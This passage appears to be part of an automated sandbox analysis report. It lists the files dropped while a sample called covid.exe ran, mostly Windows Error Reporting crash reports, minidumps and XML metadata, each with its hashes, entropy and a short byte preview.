                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:BZJxiDe0y5Mod7Jf62pXIQcQqc6mcEKcw34eFR4+HbHgoC5AJLnxZU6Shjo6iNkm:PJxWe9HkigMqjuV/u7syS274lt3du
                                                                                                                                                                    MD5:B5FE8E57E4E889840E4C822807AE8618
                                                                                                                                                                    SHA1:601C3EA95DF19A6AA68DC4B90E1097B4D1A3F6D2
                                                                                                                                                                    SHA-256:D820E2F241448964EB624C4C46BA98CEDA0DF08EA3E0913DB5EBC4F4560FFECF
                                                                                                                                                                    SHA-512:BDF11FD2C0C9353959CEA43665AC2B849D82436DFE7C360F289F9FA3A251F6368635CDC63F026517C2FE2CAA6076F3C0FFB8DAA6002BCAA0AE8000AD91553723
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.0.9.2.4.8.5.6.3.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.0.9.3.6.8.5.6.1.8.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.e.2.3.4.a.7.-.4.2.2.b.-.4.b.5.9.-.9.9.2.f.-.d.3.2.6.7.e.6.6.2.2.f.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.e.c.a.b.7.9.-.9.9.4.8.-.4.2.0.b.-.a.9.6.0.-.9.7.f.a.d.2.3.1.1.5.0.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.8.-.0.0.0.1.-.0.0.1.7.-.9.8.e.4.-.9.5.5.b.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_mobsync.exe_7ec0eae3caa970bb3a358dd54d1dc4b33fa028_c086f9de_112408b2\Report.wer
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):10614
                                                                                                                                                                    Entropy (8bit):3.756570990247043
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:HX464emiDz0y5Mod7JfgpXIQcQqc6mcEKcw34eFR4+HbHgoC5AJLnxZU6Shjo6iQ:3rPmWzQHkigMqjuV/u7s3S274lt3+
                                                                                                                                                                    MD5:04589A223CEAFDE6AD6995126BAD323C
                                                                                                                                                                    SHA1:C1FEAAB9374FB8D13017D57DF39AE56DDB7F9CC0
                                                                                                                                                                    SHA-256:8F2A65874865432A87E8E30B9CF56C230B99F7B0CC74E7F46B1519A8426A7B06
                                                                                                                                                                    SHA-512:EBA205173573DA29CDE63C679DDB6984A05EA62B8992840FD4B909494AB825988143FBF72B81252C774C773906463021339C14E472AFB0292DBBC48CF3775D7D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.1.0.1.0.8.1.5.3.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.1.0.2.9.3.3.5.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.0.7.d.a.e.5.-.8.3.9.1.-.4.c.f.a.-.9.d.9.d.-.3.d.8.e.e.d.9.1.7.8.6.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.3.4.5.a.1.6.-.c.d.b.5.-.4.5.2.7.-.8.8.5.7.-.3.a.f.7.8.b.9.7.a.7.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.5.0.-.0.0.0.1.-.0.0.1.7.-.d.e.1.3.-.e.e.6.0.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_mobsync.exe_dec4da371fcafe4b9daf4e1d1160ddc76b221fb4_c086f9de_13a04abc\Report.wer
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):9938
                                                                                                                                                                    Entropy (8bit):3.761139012919715
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:8KEFiDcy5MoU7JfdpXIQcQzc6gcEfcw3P7R4+HbHgoC5AJLnxZU6Shjo6iNkon9c:nEFWkHNkl/ju//u7s3S274lt3e
                                                                                                                                                                    MD5:424C54186A976C33D2D00C5205899BB8
                                                                                                                                                                    SHA1:47069D17BD5AE473AA0614A0BA7DD4E75F67FD6F
                                                                                                                                                                    SHA-256:B0F0F56165F5CE45ECA3DB8894444C11CCE1187FFC7794572D951896028A6E25
                                                                                                                                                                    SHA-512:875DE4072E8CC52DBB49DCD293C49E5DDD8447F19233E586D2927C48337E811FA6427C81780386F1719119EBA00CDFD199A57CE92777BE70874E73481C83254A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.1.7.6.3.1.1.2.2.9.4.6.4.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.1.7.6.3.1.1.4.4.8.3.5.8.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.9.2.1.3.3.4.c.-.8.e.2.0.-.4.9.c.7.-.8.f.8.8.-.8.6.b.0.d.5.3.7.5.d.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.8.3.d.e.1.0.-.8.e.d.5.-.4.e.2.9.-.8.8.c.9.-.7.c.9.2.9.0.d.a.9.b.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.o.b.s.y.n.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.8.0.-.0.0.0.1.-.0.0.1.7.-.7.4.5.3.-.5.f.6.6.0.8.2.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.f.8.a.0.1.b.0.e.3.b.9.a.f.a.b.f.e.1.6.3.f.1.0.e.9.d.d.d.7.b.d.e.8.7.1.f.c.7.4.!.m.o.b.s.y.n.c...e.x.e.
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BB2.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:04:53 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):66526
                                                                                                                                                                    Entropy (8bit):1.4325017610787516
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:GmnWjAgIndenHyfyxcJaJXdEJiNeOTPdPM:RWjAgIbfacEJewNeOS
                                                                                                                                                                    MD5:FBAF156E66117A00B29B938812B9DE70
                                                                                                                                                                    SHA1:5F83CF4E19C47B938E4383773309EC54EA139BCD
                                                                                                                                                                    SHA-256:7C1C2D035F4F5901F3FE833E4DEC987525DFB1E84BD2CBB7A82DFC52C25D8224
                                                                                                                                                                    SHA-512:8C43442E9C953882353901B504DC2636B39FC3E3331A1DDF12FF99264BF82C78E98F30C70816387F31278F82908E5F5E2576C9AA5997563A93B97E4CFC74A7C5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: MDMP....... .........e`...................U...........B......@.......Lw.................#....T.............e`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8ECF.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8702
                                                                                                                                                                    Entropy (8bit):3.702319147694354
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiwtDfh6YSxRrFSgmfGRSxbQCpDY89bwUlf+Qm:RrlsNiC16YERrFSgmfGRSHwGfw
                                                                                                                                                                    MD5:C31FDDB752911738B8033EC76238E8C2
                                                                                                                                                                    SHA1:53ABF96E15D9DD6F06E4DA8EB7F3D9C4C2F7C0E2
                                                                                                                                                                    SHA-256:FFD0CA2366A217D79B844A966F674EAAF3E88008A5704AA4F4D5F173831DBCDA
                                                                                                                                                                    SHA-512:CBFE8CDAD8C652ABBFCF7D7EE50C8076B6DB57134F9E3EA305C1CB453D7A4E71B4C88E08A27C4DBFB87C1E44804F20D71CE8DE6DDBF1A28A473225A99112C919
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.8.<./.P.i.d.>.......
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8FF9.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4661
                                                                                                                                                                    Entropy (8bit):4.446749039167229
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zszJgtBI9m4WSC8Bs8fm8M4JrTFvL0yq85HknIWZAd:uITfNkxSNXJS5nIWZAd
                                                                                                                                                                    MD5:75A9A21589BA83E5BA46FE923D6879A0
                                                                                                                                                                    SHA1:2C3E8B5AB930D6BF8D02DB05C6B5291284DD4237
                                                                                                                                                                    SHA-256:2FBC930E153118925C64D81DE80559724E1ECD039E5296A901A9FB7799F4BD4F
                                                                                                                                                                    SHA-512:4E73C27A5B276AEB0E0C649FBDC6AEC0C2780066F8ACB86A77D3AF0F6B6EA2BEF34D1A40A0AF6F5925CE86FB391B08A45294B58CD720E00314D21786931ECC48
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD43.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:05:01 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):67054
                                                                                                                                                                    Entropy (8bit):1.4202436436937864
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:5v48M75Zk1WcrRqD6Yyi9qHyFByxcJsOk+dCDwejJax7PCWInmIxBlNMx9Y/Itjd:Gkf9k6nnHyfyxcJaJijy4SYRDvP1J
                                                                                                                                                                    MD5:2A3627D340227862B537BF124C949A2A
                                                                                                                                                                    SHA1:2FA5D62D776396E923E81278C634A61A0DCCF341
                                                                                                                                                                    SHA-256:FFB9FFFC572294CA49AE656B0BC9379FBBD18F7F6860AB28D6B1004808C7A678
                                                                                                                                                                    SHA-512:3BF4CE554292812983AA98B67B93DC0C1AE9EE543D7EFA70F24400C6EC60A4CEFD2E54042E2B35550CB565F56DCB5110D28D87C5506134A5A274036B48091B56
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: MDMP....... .........e`...................U...........B......@.......Lw......................T.......P.....e`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0CF.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8706
                                                                                                                                                                    Entropy (8bit):3.700778354367099
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNicBG6YSGFwwNaPkgmfGSSxbQCpDa89b9F9f0c/m:RrlsNiyG6Yp9NaPkgmfGSSB9/fA
                                                                                                                                                                    MD5:7C727802E1A4DAECE8A24492540C29DD
                                                                                                                                                                    SHA1:00B54C5E1BFDE38CA256C7B0F55A9B1CB9D67E10
                                                                                                                                                                    SHA-256:2CF3F615F64CC1DA732F45AAF480729C49C26D868E10C635E64BC38F2CB4B36C
                                                                                                                                                                    SHA-512:151B35DE13A6EF3839FED9D03B863EEC7346CFC2954B83BF45E80DAFA53591D5008A8B224862A53DC2BBB3DD7326847702FA5482F00F7D9A72AFE14E73CE7796
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.2.4.<./.P.i.d.>.......
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERB350.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4661
                                                                                                                                                                    Entropy (8bit):4.448149148824588
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zszJgtBI9m4WSC8B+C8fm8M4Jr2FLyq85HHKIWZXd:uITfNkxSNgXJs3IWZXd
                                                                                                                                                                    MD5:4A8AC1E89B9A3F5275AE12A489C2CAA0
                                                                                                                                                                    SHA1:5F91FCDE84D0AE1F4B0C1585751E578D390F9C1B
                                                                                                                                                                    SHA-256:8811E4BC25D474FD6A1E107879F0E8C01A04BF14EE7F2B9ED477D0EB4E512982
                                                                                                                                                                    SHA-512:8B5BFED0B87347CA1EC194DD5D8E2779BA3ADDF60EF1FAD271BB7CEAF388D1ABD8F3FD138158533359347F90FAA2A974D89E82059C4ADD50D66ADAC4E9161DD3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD916.tmp.dmp
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Apr 1 15:05:13 2021, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49392
                                                                                                                                                                    Entropy (8bit):1.463907381718521
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:5Dz8M7rIDTQ7ppjv5i9Q89BjOwJzbsBSdvmIOJdNkqEWIXmIkrf+zAjmTdXH6:R8Kp15rmjOwJzbKk+6AjmTNa
                                                                                                                                                                    MD5:315AB688F5E943BA50A7756C3AE12078
                                                                                                                                                                    SHA1:9D6DAB55E9976BCCB88EF86078D48CE9AFC8EACE
                                                                                                                                                                    SHA-256:C7B3C8F76DBFEFF1E13F16E8734403E5C48B88D3C972F324FA44FE2CA5434AAE
                                                                                                                                                                    SHA-512:0FC964141DE46FB7EAAAE74884CE4E3872BA401211B72ABBD7D77EE73C5038FC61B63EA434D4FE3C6DC0924D6813A96F9E70383C0295566E013F06111F9C3448
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: MDMP....... .......).e`...................U...........B..............Lw................X.....T...........".e`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDEB5.tmp.WERInternalMetadata.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8570
                                                                                                                                                                    Entropy (8bit):3.7049434717342553
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:Rrl7r3GLNiiXm186YSPvcev4gmfGuSoCpDm89baF0fCem:RrlsNir26Yavcev4gmfGuS3a2fy
                                                                                                                                                                    MD5:265FDA26C393EF9DE58EC50497EE030B
                                                                                                                                                                    SHA1:A5D6501C569A8404B2E2805406079494F8477F11
                                                                                                                                                                    SHA-256:0D0EAE573327203B197741171F50A2B83097811F7D524EC41744CEEF803AB6F2
                                                                                                                                                                    SHA-512:AC4F0C4D71940E2D257892CDEE1CD69E253298ED65B0CCD38EFDB518A5D5E944A5C8AE5F31D950CE01BD30E4A66C6C4A95FB4D487F01A4850722C891220A31E1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.4.<./.P.i.d.>.......
                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0E8.tmp.xml
                                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4721
                                                                                                                                                                    Entropy (8bit):4.482158702436243
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwSD8zszJgtBI9m4WSC8B+Iq8fm8M4Jr+F1SEyq85cOIWZfd:uITfNkxSNgeJwSEKIWZfd
                                                                                                                                                                    MD5:0FA584E094B88703B889AD681A3A5F51
                                                                                                                                                                    SHA1:C9163359297B38A8282411886E56945A1A0734E4
                                                                                                                                                                    SHA-256:5204614E201BDC5C4657C211E0EA637AD201FB6C9DC5C945F5B0B08D7ABE53CA
                                                                                                                                                                    SHA-512:82B8E9DF0E2A0CA9CB0C17D44A1CF5522662AA91233909223B46A7847B69D84FD2013E340206FF48AC3D9D41C178DFAEF7CBA55FFD6C6DBD918AF4221AFC4987
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="927375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\covid.exe.log
                                                                                                                                                                    Process:C:\Users\user\Desktop\covid.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):226
                                                                                                                                                                    Entropy (8bit):5.354940450065058
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
